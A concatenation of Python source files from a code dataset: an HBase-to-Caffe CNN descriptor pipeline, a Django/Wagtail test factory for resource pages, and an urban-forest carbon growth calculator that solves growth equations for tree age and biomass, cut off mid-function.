subdir_split=SMQTK_DESCRIPTOR_DIR_SPLIT)
class HBaseFeeder (multiprocessing.Process):
"""
Uses above ``HBASE_*`` configuration properties aside from key variables
which are provided to the constructor.
Scans the configured HBase table from start to stop keys, feeding to the
given queue:
(key, filepath)
pairs after writing the queries binary data to temp files.
Writes a None value to the queue when it is done scanning and will not
produce any more pairs.
TODO:
- Split out the temp file writing into a separate process in between
this and the descriptor generator process.
"""
# Number of cores to use for parallel operations, or all cores if
# set to None.
PARALLEL = None
@property
def log(self):
return logging.getLogger("compute.HBaseFeeder")
def __init__(self, start_key, stop_key, feed_queue, batch_size):
super(HBaseFeeder, self).__init__(name="HBaseFeeder")
self.start_key = start_key
self.stop_key = stop_key
self.queue = feed_queue
self.batch_size = batch_size
# HBase things
self.connection = None
self.table = None
def _new_scan_iter(self, start_key):
self.log.info("Initializing HBase connection/table/scan from key: %s", start_key)
self.connection = happybase.Connection(HBASE_ADDRESS, timeout=HBASE_TIMEOUT)
self.table = self.connection.table(HBASE_TABLE)
return self.table.scan(
row_start=start_key,
row_stop=self.stop_key,
batch_size=self.batch_size,
columns=[HBASE_BINARY_COL]
)
def run(self):
doc_batch = {}
last_key = None
i = 0
scan_iter = self._new_scan_iter(self.start_key)
running = True
while running:
key = doc = None
try:
key, doc = scan_iter.next()
except IOError:
# Expected for a scan timeout error. Re-initialize connection
self.log.warn("HBase connection timed out. Initializing new scan connection")
scan_iter = self._new_scan_iter(last_key or self.start_key)
continue
except StopIteration:
# Finished scan
self.log.info("Finished scan iteration.")
running = False
continue
except:
self.log.warn("Encountered unknown exception when trying to "
"get next key-doc pair (probably an HBase "
"issue). Reinitializing connection/scan.")
scan_iter = self._new_scan_iter(last_key or self.start_key)
continue
# Normalize hex casing
key = key.lower()
i += 1
if last_key:
assert int(key, 16) > int(last_key, 16), \
"Found an key iteration order exception: '%s' >! '%s'" \
% (key, last_key)
last_key = key
if i % self.batch_size == 0:
self.log.info("scanned %d total keys", i)
# Make a temporary DescriptorFileElement to see if this key has been computed before or not.
if make_descriptor(key).has_vector():
self.log.debug("vector with key '%s' already computed", key)
continue
binary = doc[HBASE_BINARY_COL]
if not binary:
self.log.debug("Skipping '%s', zero binary data", key)
continue
doc_batch[key] = binary
if len(doc_batch) >= self.batch_size:
self.log.info("Completed batch of %d elements from HBase, writing to files",
self.batch_size)
pool = multiprocessing.pool.ThreadPool(self.PARALLEL)
pool.map(async_write_temp, zip(*zip(*doc_batch.iteritems()) + [[self.queue]*len(doc_batch)]))
pool.close()
pool.join()
self.log.info("Cleaning up processes")
del pool, # temp_files, key, binaries
doc_batch = {}
# Write anything remaining in the batch structure
pool = multiprocessing.pool.ThreadPool(self.PARALLEL)
pool.map(async_write_temp, zip(*zip(*doc_batch.iteritems()) + [[self.queue]*len(doc_batch)]))
pool.close()
pool.join()
self.queue.put(None)
def set_descriptor(p):
"""
Create SMQTK DescriptorFileElement instance for a given descriptor vector.
Intended for use within a pool.map call, thus the tuple expansion of input.
"""
key, vector = p
e = make_descriptor(key)
e.set_vector(vector)
return e
class CaffeDescriptorGenerator (multiprocessing.Process):
"""
Compute CNN descriptors on files fed to this process via the provided
input queue. We expect (key, img_file) pairs, where key is the SHA1 hash
of the file. We output the greatest SHA1 hash of a completed batch of pairs
to the provided ``complete_queue`` queue. This hash can be used as a
checkpoint for the feeder so we don't reprocess material that we have
already finished.
"""
# Number of cores to use for parallel operations, or all if set to None
PARALLEL = None
@property
def log(self):
return logging.getLogger('compute.DescriptorGenerator')
def __init__(self, input_queue, complete_queue, batch_size, gpu_batch_size):
super(CaffeDescriptorGenerator, self).__init__(name="CaffeDescriptorGenerator")
self.in_queue = input_queue
self.complete_queue = complete_queue
self.batch_size = batch_size
self.gpu_batch_size = gpu_batch_size
def run(self):
running = True
batch = {}
while running:
try:
input = self.in_queue.get()
if input is None:
self.log.info("Received terminal message. Closing down.")
running = False
continue
key, temp_file = input
# Make a temporary DescriptorFileElement to see if this key has been computed before or not.
if make_descriptor(key).has_vector():
self.log.debug("vector with key '%s' already computed", key)
os.remove(temp_file)
continue
batch[key] = temp_file
if len(batch) >= self.batch_size:
self.process_batch(batch, self.gpu_batch_size)
self.complete_queue.put(max(batch))
batch.clear()
except IOError, ex:
self.log.warning("Failed to pull from input queue, closing down.")
running = False
if batch:
# Finish up what ever is currently in the batch
# - Pick largest factor of remaining batch size less than the
# configured GPU batch size.
gpu_b_size = \
max([f for f in smqtk.utils.factors.factors(len(batch))
if f <= self.gpu_batch_size])
self.log.info("Computing remaining batch of size %d (GPU batch: %d)",
len(batch), gpu_b_size)
self.process_batch(batch, gpu_b_size)
self.complete_queue.put(None)
def process_batch(self, batch, gpu_batch_size):
assert len(batch) % gpu_batch_size == 0, \
"GPU Batch size does not evenly divide the given computation batch"
cnn_minibatch_size = len(batch) / gpu_batch_size
keys, temp_files = zip(*batch.items())
# Write out path-list file
# - Caffe needs the trailing '0', else there will be a non-descript
# segfault.
self.log.info("Generating work file path list")
fd, list_filepath = tempfile.mkstemp(suffix='.txt', dir=TEMP_DIR)
os.close(fd)
with open(list_filepath, 'w') as ofile:
for tf in temp_files:
ofile.write('%s 0\n' % tf)
# generate prototxt configuration file
self.log.info("Generating prototext config file")
config_str = CNN_PROTOTXT_TEMPLATE.render(**{
"image_mean_filepath": CNN_IMAGE_MEAN,
"image_filelist_filepath": list_filepath,
"batch_size": gpu_batch_size,
})
fd, protoconfig_filepath = tempfile.mkstemp(suffix='.prototxt', dir=TEMP_DIR)
os.close(fd)
with open(protoconfig_filepath, 'w') as ofile:
ofile.write(config_str)
# Call executable
fd, output_filebase = tempfile.mkstemp(dir=TEMP_DIR)
os.close(fd)
os.remove(output_filebase)
# The output file that actually gets generated
output_csv = output_filebase + '.csv'
call_args = [
CNN_EXE, CNN_CAFFE_MODE, protoconfig_filepath, 'fc7',
output_filebase, str(cnn_minibatch_size), 'csv', 'GPU'
]
self.log.info("Call args: %s", call_args)
proc_cnn = subprocess.Popen(call_args)
rc = proc_cnn.wait()
if rc:
self.log.warn("Failed to execute CNN executable with return code: %s", rc)
self.log.warn("Skipping images in previous batch due to error")
#raise RuntimeError("Failed to execute CNN executable with return code: %s" % rc)
else:
# if we succeeded,
# Parse output file into SMQTK DescriptorElement instances
self.log.info("Parsing output descriptors")
pool = multiprocessing.Pool(self.PARALLEL)
d_elems = pool.map(set_descriptor,
zip(keys, smqtk.utils.file_utils.iter_csv_file(output_csv)))
pool.close()
pool.join()
# Remove temp files used
self.log.info("Cleaning up")
pool = multiprocessing.Pool(self.PARALLEL)
pool.map(os.remove, temp_files)
pool.close()
pool.join()
os.remove(list_filepath)
os.remove(protoconfig_filepath)
os.remove(output_csv)
self.log.info("Returning elements")
def run():
log = logging.getLogger("compute.run2")
log.info("Feed queue max size: %d", FEED_QUEUE_MAX_SIZE)
f_queue = multiprocessing.Queue(FEED_QUEUE_MAX_SIZE)
c_queue = multiprocessing.Queue() # This queue will never effectively be that large
if os.path.exists(HBASE_KEY_CHECKPOINT_FILEPATH):
with open(HBASE_KEY_CHECKPOINT_FILEPATH) as f:
start_key = f.read().strip()
log.info("starting from key: '%s'", start_key)
else:
start_key = HBASE_START_KEY
feeder = HBaseFeeder(start_key, HBASE_STOP_KEY, f_queue, HBASE_BATCH_SIZE)
generator = CaffeDescriptorGenerator(f_queue, c_queue, CNN_BATCH_SIZE, CNN_GPU_BATCH_SIZE)
feeder.start()
generator.start()
log.info("Monitoring complete queue for checkpoint keys")
checking = True
while checking:
k = c_queue.get()
if k is None:
checking = False
else:
with open(HBASE_KEY_CHECKPOINT_FILEPATH, 'w') as f:
f.write(k)
log.info("Checkpointed key: '%s'", k)
log.info("Waiting for worker processes to complete.")
feeder.join()
generator.join()
if __name__ == "__main__":
smqtk.utils.bin_utils.initialize_logging(logging.getLogger('compute'), logging.INFO)
run()
| 34.650108 | 111 | 0.63442 |
59da50cf240a71fbac66c2a9b071e154da0ec946 | 1,966 | py | Python | functional_tests/factory/resource_factory.py | 9sneha-n/pari | 78e1e4851e484c076ce6ba3c76d1db081aacbc9a | [
"BSD-3-Clause"
] | 35 | 2015-10-04T17:07:20.000Z | 2022-03-23T08:10:13.000Z | functional_tests/factory/resource_factory.py | 9sneha-n/pari | 78e1e4851e484c076ce6ba3c76d1db081aacbc9a | [
"BSD-3-Clause"
] | 322 | 2015-07-31T17:06:47.000Z | 2022-02-10T07:17:55.000Z | functional_tests/factory/resource_factory.py | 9sneha-n/pari | 78e1e4851e484c076ce6ba3c76d1db081aacbc9a | [
"BSD-3-Clause"
] | 14 | 2016-05-09T10:50:20.000Z | 2021-05-08T14:48:51.000Z | import factory
from django.contrib.contenttypes.models import ContentType
from django.utils.text import slugify
from wagtail.core.rich_text import RichText
from resources.models import Resource
class ContentTypeFactory(factory.django.DjangoModelFactory):
class Meta:
model = ContentType
django_get_or_create = ('app_label', 'model')
app_label = "core"
model = "homepage"
class ResourceFactory(factory.django.DjangoModelFactory):
class Meta:
model = Resource
path = factory.Sequence(lambda n: u'00010{}'.format(n)) # from wagtailcore_pagerevision
depth = 3
numchild = 0
title = 'Dummy Resource Page'
slug = factory.LazyAttribute(lambda obj: slugify(obj.title))
live = True
has_unpublished_changes = False
show_in_menus = False
search_description = ''
go_live_at = '1995-02-07 12:00'
expire_at = '2050-12-31 12:43'
expired = False
content_type = factory.SubFactory(ContentTypeFactory, app_label="resource", model="resource")
locked = False
latest_revision_created_at = '1995-02-07 12:00'
first_published_at = '1995-02-07 12:00'
language = 'en'
content = [('authors', RichText('<p>XYZ</p>')),
('copyright', RichText('<p>XYZ, Professor, Centre for Economic Studies and Planning</p><p>\u00a0</p>')),
('focus',
RichText('<p>The 2008 global food price fluctuations -- especially the policies on bio-fuel and the neglect of agriculture.</p>')),
('factoids', RichText('<p>Lack of public investment in agriculture and agriculture research .</p>'))]
@classmethod
def _setup_next_sequence(cls):
return getattr(cls, 'starting_sequence_num', 20)
@factory.post_generation
def categories(self, create, extracted, **kwargs):
if not create:
return
if extracted:
for category in extracted:
self.categories.add(category)
| 33.896552 | 147 | 0.669379 |
0f3208ac4aa8e0cd144fa044a7212156aafe85f3 | 26,210 | py | Python | growth.py | Venkatprasadkalet1/carboncalc | b7a66407b453e16d9b8606f6ceac43e882c16b19 | [
"Unlicense"
] | null | null | null | growth.py | Venkatprasadkalet1/carboncalc | b7a66407b453e16d9b8606f6ceac43e882c16b19 | [
"Unlicense"
] | null | null | null | growth.py | Venkatprasadkalet1/carboncalc | b7a66407b453e16d9b8606f6ceac43e882c16b19 | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Fri Apr 18 13:06:05 2014
@author: adh
Urban forest calculator: Calculate carbon added in previous year.
"""
import biomass
import sqlite3
from numpy import exp, log, sqrt
from scipy.optimize import brentq, fsolve
UrbForDB = "/home/adh/UrbanForests/UrbanForestCC.sqlite"
roots = 1.00
carbon_fraction = 0.5
co2_fraction = 3.67
dbconn = sqlite3.connect(UrbForDB)
def equation_loglogw1(x, a, b, c, d, e):
"""Equation form for loglogw1 """
return exp(a + b * log(log(x+1) + (c/2)))
def equation_loglogw2(x, a, b, c, d, e):
"""Equation form for loglogw2 """
return exp(a + b * log(log(x+1)) + (sqrt(x) * (c/2)))
def equation_loglogw3(x, a, b, c, d, e):
"""Equation form for loglogw3 """
return exp(a + b * log(log(x+1)) + x * c/2)
def equation_loglogw4(x, a, b, c, d, e):
"""Equation form for loglogw4 """
return exp(a + b * log(log(x+1))+ x * x * c/2)
def equation_lin(x, a, b, c=0, d=0, e=0):
"""Equation form for lin """
return a + b*x
def equation_quad(x, a, b, c, d=0, e=0):
"""Equation form for quad """
return a + b*x + c*x*x
def equation_cub(x, a, b, c, d, e):
"""Equation form for cub """
return a + b*x + c*x*x + d*x*x*x
def equation_quart(x, a, b, c, d, e):
"""Equation form for quart """
return a + b*x + c*x*x + d*x*x*x + e*x*x*x*x
def equation_expow1(x, a, b, c, d, e):
"""Equation form for expow1 """
return exp(a + b*x + c/10)
def equation_expow2(x, a, b, c, d, e):
"""Equation form for expow2 """
return exp(a + b*x + sqrt(x)*c/2)
def equation_expow3(x, a, b, c, d, e):
"""Equation form for expow3 """
return exp(a + b*x + x*c/2)
def equation_expow4(x, a, b, c, d, e):
"""Equation form for expow4 """
return exp(a + b*x + x*x*c/2)
eqn_lookup = {'lin1/age^2': equation_lin, 'quad1/age^2': equation_quad,
'quad1/age': equation_quad, 'cub1/age^2': equation_cub,
'loglogw1': equation_loglogw1, 'loglogw3': equation_loglogw3,
'lin1/age': equation_lin, 'lin1/sqrtage': equation_lin,
'quad1/sqrtdbh': equation_quad, 'loglogw2': equation_loglogw2,
'quad1/dbh': equation_quad, 'loglogw4': equation_loglogw4,
'quad1/dbh^2': equation_quad, 'lin1/dbh': equation_lin,
'lin1/dbh^2': equation_lin, 'quart1/age': equation_quart,
'lin1/sqrtdbh': equation_lin, u'lin1/sqrtdbh': equation_lin,
'lin1': equation_lin, 'expow1': equation_expow1,
'quad1': equation_quad, 'quad1/ht': equation_quad,
'cub1/dbh^2': equation_cub, 'quad1/sqrht': equation_quad,
'cub1/ht': equation_cub, 'expow2': equation_expow2,
'cub1/dbh': equation_cub, 'cuborig1/sqrtage': equation_cub,
'cub1/ht^2': equation_cub, 'cub1/sqrtht': equation_cub,
'quad1/sqrtage': equation_quad, 'cub1/sqrtdbh': equation_cub,
'cub1': equation_cub, 'cub1/age': equation_cub,
'cub1/sqrtage': equation_cub, 'quadorig1/age': equation_quad,
'quart1/sqrtht': equation_quart, 'expow4': equation_expow4,
'expow3': equation_expow3, 'lin1/ht^2': equation_lin,
'quad1/ht^2': equation_quad, 'lin1/ht': equation_lin,
'quadorig1/sqrtht': equation_quad, 'cuborig1/sqrtht': equation_cub,
'loglog1': equation_loglogw1}
eqsolver_lookup = {'lin1/age^2': 'brentq', 'quad1/age^2': 'fsolve',
'quad1/age': 'fsolve', 'cub1/age^2': 'fsolve',
'loglogw1': 'brentq', 'loglogw3': 'brentq',
'lin1/age': 'brentq', 'lin1/sqrtage': 'brentq',
'quad1/sqrtdbh': 'fsolve', 'loglogw2': 'brentq',
'quad1/dbh': 'fsolve', 'loglogw4': 'brentq',
'quad1/dbh^2': 'fsolve', 'lin1/dbh': 'brentq',
'lin1/dbh^2': 'brentq', 'quart1/age': 'fsolve',
'lin1/sqrtdbh': 'brentq', u'lin1/sqrtdbh': 'brentq',
'lin1': 'brentq', 'expow1': 'brentq',
'quad1': 'fsolve', 'quad1/ht': 'fsolve',
'cub1/dbh^2': 'fsolve', 'quad1/sqrht': 'fsolve',
'cub1/ht': 'fsolve', 'expow2': 'brentq',
'cub1/dbh': 'fsolve', 'cuborig1/sqrtage': 'fsolve',
'cub1/ht^2': 'fsolve', 'cub1/sqrtht': 'fsolve',
'quad1/sqrtage': 'fsolve', 'cub1/sqrtdbh': 'fsolve',
'cub1': 'fsolve', 'cub1/age': 'fsolve',
'cub1/sqrtage': 'fsolve', 'quadorig1/age': 'fsolve',
'quart1/sqrtht': 'fsolve', 'expow4': 'brentq',
'expow3': 'brentq', 'lin1/ht^2': 'brentq',
'quad1/ht^2': 'fsolve', 'lin1/ht': 'brentq',
'quadorig1/sqrtht': 'fsolve', 'cuborig1/sqrtht': 'fsolve',
'loglog1': 'brentq'}
def root_form(fn, y0):
"""Returns rewritten equation fn to find root at y value y0"""
def fn2(x, a=0, b=0, c=0, d=0, e=0):
return fn(x, a, b, c, d, e) - y0
return fn2
#def find_eqn_root(fn, y0, a, b, c, d, e, lower_bound, upper_bound):
# fn2 = root_form(fn, y0)
# x0 = brentq(fn2, args=(a, b, c, d, e), a=lower_bound, b=upper_bound)
# return
# Let's try a different solver.
def find_eqn_root(fn, y0, eqstr, a, b, c, d, e, lower_bound, upper_bound):
"""Finds root of equation fn at y value y0. """
#tol = 0.001
#step = 0.1
fn2 = root_form(fn, y0)
#if abs(fn2(lower_bound) < tol):
# lower_bound = lower_bound - step
#if abs(fn2(upper_bound) < tol):
# upper_bound = upper_bound + step
#print lower_bound, upper_bound
#x0 = brentq(fn2, args=(a, b, c, d, e), a=lower_bound, b=upper_bound)
# bloody hell. let's try making the solver dependent on the functional form.
if eqsolver_lookup[eqstr] == 'fsolve':
froots = fsolve(fn2, (lower_bound + upper_bound)/2, args=(a, b, c, d, e))
#froots = fsolve(fn2, [lower_bound, upper_bound],args=(a, b, c, d, e))
#print froots
x0 = froots[0]
else:
x0 = brentq(fn2, args=(a, b, c, d, e), a=lower_bound, b=upper_bound)
return x0
def nfloat(s):
"""Return floating point value of s if possible, None if not"""
if not s == None:
try:
return float(s)
except ValueError:
return None
else:
return None
def growth_calc_species(dbconn, speccode, region):
"""Returns species growth assignment type given species speccode and region code"""
qstr = "SELECT GrowthAssign FROM SpeciesCodeList WHERE SpeciesCode = '%s' AND Region = '%s'" % (speccode, region)
c = dbconn.cursor()
c.execute(qstr)
qresult = c.fetchone()
(growthspecies0) = qresult
growthspecies = growthspecies0[0]
if "OTHER" in growthspecies:
qstr = "SELECT GrowthAssign FROM SpeciesCodeList WHERE SpeciesCode = '%s' AND Region = '%s'" % (growthspecies, region)
c.execute(qstr)
qresult = c.fetchone()
(growthspecies0) = qresult
growthspecies = growthspecies0[0]
return growthspecies
#==============================================================================
# def growth_calc_eqn(dbconn, speccode, region):
# growthspecies = growth_calc_species(dbconn, speccode, region)
# c = dbconn.cursor()
# qstr = "SELECT EqName, a, b, c, d, e, AppsMin, AppsMax FROM GrowCoeffs WHERE SpecCode = '%s' AND Region = '%s' AND Component = 'd.b.h.'" % (growthspecies, region)
# c.execute(qstr)
# qresult = c.fetchone()
# if qresult:
# (eqstr, a, b, c, d, e, AppsMin, AppsMax) = qresult
# eqtype = 'dbh'
# else:
# qstr = "SELECT EqName, a, b, c, d, e, AppsMin, AppsMax FROM GrowCoeffs WHERE SpecCode = '%s' AND Region = '%s' AND Component = 'tree ht'" % (growthspecies, region)
# c.execute(qstr)
# qresult = c.fetchone()
# (eqstr, a, b, c, d, e, AppsMin, AppsMax) = qresult
# eqtype = 'tree ht'
# return eqn_lookup[eqstr], eqtype, nfloat(a), nfloat(b), nfloat(c), nfloat(d), nfloat(e), nfloat(AppsMin), nfloat(AppsMax)
#==============================================================================
def growth_calc_eqn2(dbconn, speccode, region, comptype):
"""Returns equation form and parameters given species code and region."""
growthspecies = growth_calc_species(dbconn, speccode, region)
c = dbconn.cursor()
if comptype == 'd.b.h.':
qstr = "SELECT EqName, a, b, c, d, e, AppsMin, AppsMax FROM GrowCoeffs WHERE SpecCode = '%s' AND Region = '%s' AND Component = 'd.b.h.'" % (growthspecies, region)
c.execute(qstr)
qresult = c.fetchone()
(eqstr, a, b, c, d, e, AppsMin, AppsMax) = qresult
eqtype = 'dbh'
else:
qstr = "SELECT EqName, a, b, c, d, e, AppsMin, AppsMax FROM GrowCoeffs WHERE SpecCode = '%s' AND Region = '%s' AND Component = 'tree ht'" % (growthspecies, region)
c.execute(qstr)
qresult = c.fetchone()
(eqstr, a, b, c, d, e, AppsMin, AppsMax) = qresult
eqtype = 'tree ht'
return eqn_lookup[eqstr], eqtype, eqstr, nfloat(a), nfloat(b), nfloat(c), nfloat(d), nfloat(e), nfloat(AppsMin), nfloat(AppsMax)
#==============================================================================
# def age_calc(dbconn, speccode, region, dbh, ht, rounded, lower_bound, upper_bound):
# """Compute age given dbh or height. Calls function solving eqn that predict dbh|ht from age."""
# (eqn, eqtype, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn(dbconn, speccode, region)
# #print eqn, eqtype, a, b, c, d, e, AppsMin, AppsMax
# if eqtype == 'dbh':
# age = find_eqn_root(eqn, dbh, a, b, c, d, e, lower_bound, upper_bound)
# else:
# age = find_eqn_root(eqn, ht, a, b, c, d, e, lower_bound, upper_bound)
# if rounded:
# age = int(age)
# return age
#==============================================================================
def age_calc2(dbconn, speccode, region, dbh, ht, rounded, lower_bound, upper_bound, comptype):
"""Compute age given dbh or height. Calls function solving eqn that predict dbh|ht from age."""
#print "lower bound:upper bound: ", lower_bound, upper_bound
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, comptype)
#print eqn, eqtype, a, b, c, d, e, AppsMin, AppsMax
if eqtype == 'dbh':
age = find_eqn_root(eqn, dbh, eqstr, a, b, c, d, e, lower_bound, upper_bound)
else:
age = find_eqn_root(eqn, ht, eqstr, a, b, c, d, e, lower_bound, upper_bound)
#print "age_calc2 age: ", age
if rounded:
age = int(age)
return age
#def biomass_diff(dbconn, speccode, region, dbh=0, ht=0, round=False, lower_bound=0, upper_bound=100):
# """Return increase in biomass between current year and previous year."""
# curr_age = age_calc(dbconn, speccode, region, dbh, ht, round, lower_bound, upper_bound)
# curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh, ht)
# prev_age = curr_age - 1
# print "Ages: ", curr_age, prev_age
# (eqn, eqtype, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn(dbconn, speccode, region)
# if eqtype == 'dbh':
# if round:
# curr_dbh = eqn(curr_age, a, b, c, d, e)
# curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=curr_dbh, ht=0)
# prev_dbh = eqn(prev_age, a, b, c, d, e)
# # Let's deal with case where previous dbh is negative.
# if prev_dbh <= 0:
# prev_dbh = AppsMin
# prev_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=prev_dbh, ht=0)
# else:
# if round:
# curr_ht = eqn(curr_age, a, b, c, d, e)
# curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=0, ht=curr_ht)
# prev_ht = eqn(prev_age, a, b, c, d, e)
# if prev_ht <= 0:
# prev_ht = AppsMin
# prev_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=0, ht=prev_ht)
# print curr_biomass
# print prev_biomass
# # the results table sets the CO2 sequestration to the carbon stored in this minimum limiting case.
# if abs(curr_biomass[0] - prev_biomass[0]) <= 1e-02:
# return (curr_biomass[0], curr_biomass[1], curr_biomass[2])
# else:
# return (curr_biomass[0]-prev_biomass[0], curr_biomass[1]-prev_biomass[1], curr_biomass[2]-prev_biomass[2])
# now fiddling with new min/max age table
#==============================================================================
# def biomass_diff(dbconn, speccode, region, dbh=0, ht=0, rounded=False, lower_bound=0, upper_bound=100):
# """Return increase in biomass between current year and previous year."""
# c = dbconn.cursor()
# qstr = "SELECT AppsMin, AppsMax, AppsMinAge, AppsMaxAge FROM GrowCoeffsMinMAX WHERE SpecCode = '%s' AND Region = '%s'" % (speccode, region)
# c.execute(qstr)
# qresult = c.fetchone()
# (appsmin, appsmax, appsminage, appsmaxage) = qresult
# curr_age = age_calc(dbconn, speccode, region, dbh, ht, rounded, appsminage, appsmaxage)
# curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh, ht)
# prev_age = curr_age - 1
# #print "Ages: ", curr_age, prev_age
# (eqn, eqtype, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn(dbconn, speccode, region)
# if eqtype == 'dbh':
# if rounded:
# curr_dbh = eqn(curr_age, a, b, c, d, e)
# curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=curr_dbh, ht=0)
# prev_dbh = eqn(prev_age, a, b, c, d, e)
# # Let's deal with case where previous dbh is negative.
# # Nope. Let's use age as the criteriod.
# if curr_age <= appsminage or prev_age < appsminage:
# prev_dbh = AppsMin
# else:
# prev_dbh = eqn(prev_age, a, b, c, d, e)
# prev_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=prev_dbh, ht=0)
# else:
# if rounded:
# curr_ht = eqn(curr_age, a, b, c, d, e)
# curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=0, ht=curr_ht)
# prev_ht = eqn(prev_age, a, b, c, d, e)
# if curr_age <= appsminage or prev_age < appsminage:
# prev_ht = AppsMin
# else:
# prev_ht = eqn(prev_age, a, b, c, d, e)
# prev_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=0, ht=prev_ht)
# #print curr_biomass
# #print prev_biomass
# # the results table sets the CO2 sequestration to the carbon stored in this minimum limiting case.
# # not quite -- if prev_biomass fails (negative age e.g.), the calc blows up
# if abs(curr_biomass[0] - prev_biomass[0]) <= 1e-02:
# return (curr_biomass[0], curr_biomass[1], curr_biomass[2])
# else:
# return (curr_biomass[0]-prev_biomass[0], curr_biomass[1]-prev_biomass[1], curr_biomass[2]-prev_biomass[2])
#==============================================================================
def biomass_diff2(dbconn, speccode, region, dbh, ht, rounded=False, lower_bound=0, upper_bound=100):
"""Return increase in biomass between current year and previous year.
Args:
dbconn - database connection handle
speccode - species code
region - region code
dbh - Tree dbh in cm
ht - Tree height in m
rounded - Are ages rounded to the nearest year?
lower_bound - lower age bound (not used)
upper_bound - upper age bound (not used)
Returns:
(difference between current and previous years' biomass,
difference between current and previous years' carbon,
difference between current and previous years' CO2 equivalent)
"""
c = dbconn.cursor()
# need to use growth_species calc here. good thing I have a function.
growthspecies = growth_calc_species(dbconn, speccode, region)
qstr = "SELECT AppsMin, AppsMax, AppsMinAge, AppsMaxAge FROM GrowCoeffsMinMAX WHERE SpecCode = '%s' AND Region = '%s'" % (growthspecies, region)
c.execute(qstr)
qresult = c.fetchone()
(appsmin, appsmax, appsminage, appsmaxage) = qresult
print "appsmin: ", appsmin, "appsmax: ", appsmax, "appsminage: ", appsminage, "appsmaxage: ", appsmaxage
qstr = "SELECT b.EqnName FROM SpeciesCodeList a, VolBioCoeffs b WHERE a.BioMassAssign = b.SpecCode AND a.SpeciesCode = '%s' AND a.Region = '%s'" % (speccode, region)
c = dbconn.cursor()
c.execute(qstr)
qresult = c.fetchone()
(eqn2) = qresult
minmaxtype = biomass.minmaxtypedict[eqn2[0]]
print "eqn: ", eqn2[0], "minmaxtype: ", minmaxtype
if minmaxtype == 'dbh':
if dbh <= appsmin:
dbh = appsmin
curr_age = appsminage
elif dbh >= appsmax:
curr_age = appsmaxage
else:
curr_age = age_calc2(dbconn, speccode, region, dbh, ht, rounded, appsminage, appsmaxage, 'd.b.h.')
else:
if ht <= appsmin:
ht = appsmin
curr_age = appsminage
elif ht >= appsmax:
curr_age = appsmaxage
else:
curr_age = age_calc2(dbconn, speccode, region, dbh, ht, rounded, appsminage, appsmaxage, 'tree ht')
#curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh, ht)
prev_age = curr_age - 1
print "Ages: ", curr_age, prev_age, 'appsminage: ', appsminage, 'appsmaxage: ', appsmaxage
# what if we redo this logic such that we compute previous dbh and height for all
# species. i think this needs rewriting...
if curr_age >= appsmaxage:
if minmaxtype == 'dbh':
dbh = appsmax - 0.0001
else:
ht = appsmax - 0.0001
if curr_age <= appsminage or prev_age < appsminage:
if minmaxtype == 'dbh':
prev_dbh = appsmin
#prev_ht = ht # I persist with the problem for now...slightly changed
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, 'tree ht')
prev_ht = eqn(prev_dbh, a, b, c, d, e)
else:
prev_ht = appsmin
prev_dbh = dbh
prev_age = appsminage
curr_age = appsminage + 1
else:
try:
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, 'd.b.h.')
prev_dbh = eqn(prev_age, a, b, c, d, e)
except TypeError: # there are no d.b.h. equations in the grow coeffs table.
prev_dbh = 0
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, 'tree ht')
if minmaxtype == 'dbh':
prev_ht = eqn(prev_dbh, a, b, c, d, e) # not sure this is true for all eqns! don't look like it.
else:
prev_ht = eqn(prev_age, a, b, c, d, e) # so try this
if rounded:
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, 'd.b.h.')
curr_dbh = eqn(curr_age, a, b, c, d, e)
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, 'tree ht')
curr_ht = eqn(curr_age, a, b, c, d, e)
else:
#==============================================================================
# curr_dbh = dbh
# curr_ht = ht
#==============================================================================
#print "in corr block"
if minmaxtype == 'dbh':
#print "corr ht"
curr_dbh = dbh
(eqn, eqtype, eqstr, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, 'tree ht')
curr_ht = eqn(curr_dbh, a, b, c, d, e)
#print "corr currht: ", curr_ht, "curr age: ", curr_age
else:
curr_ht = ht
curr_dbh = dbh
#print "corr dbh"
#(eqn, eqtype, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn2(dbconn, speccode, region, 'd.b.h.')
#curr_dbh = eqn(curr_age, a, b, c, d, e)
# print "curr_dbh: ", curr_dbh, "curr_ht: ", curr_ht, "prev_dbh: ", prev_dbh, "prev_ht: ", prev_ht
curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=curr_dbh, ht=curr_ht)
prev_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=prev_dbh, ht=prev_ht)
#==============================================================================
# (eqn, eqtype, a, b, c, d, e, AppsMin, AppsMax) = growth_calc_eqn(dbconn, speccode, region)
# if eqtype == 'dbh':
# if rounded:
# curr_dbh = eqn(curr_age, a, b, c, d, e)
# curr_biomass = biomass.biomass_calc(dbconn, speccode, region, dbh=curr_dbh, ht=0)
# prev_dbh = eqn(prev_age, a, b, c, d, e)
# # Let's deal with case where previous dbh is negative.
# # Nope. Let's use age as the criteriod.
# if curr_age <= appsminage or prev_age < appsminage:
# prev_dbh = AppsMin
# else:
# prev_dbh = eqn(prev_age, a, b, c, d, e)
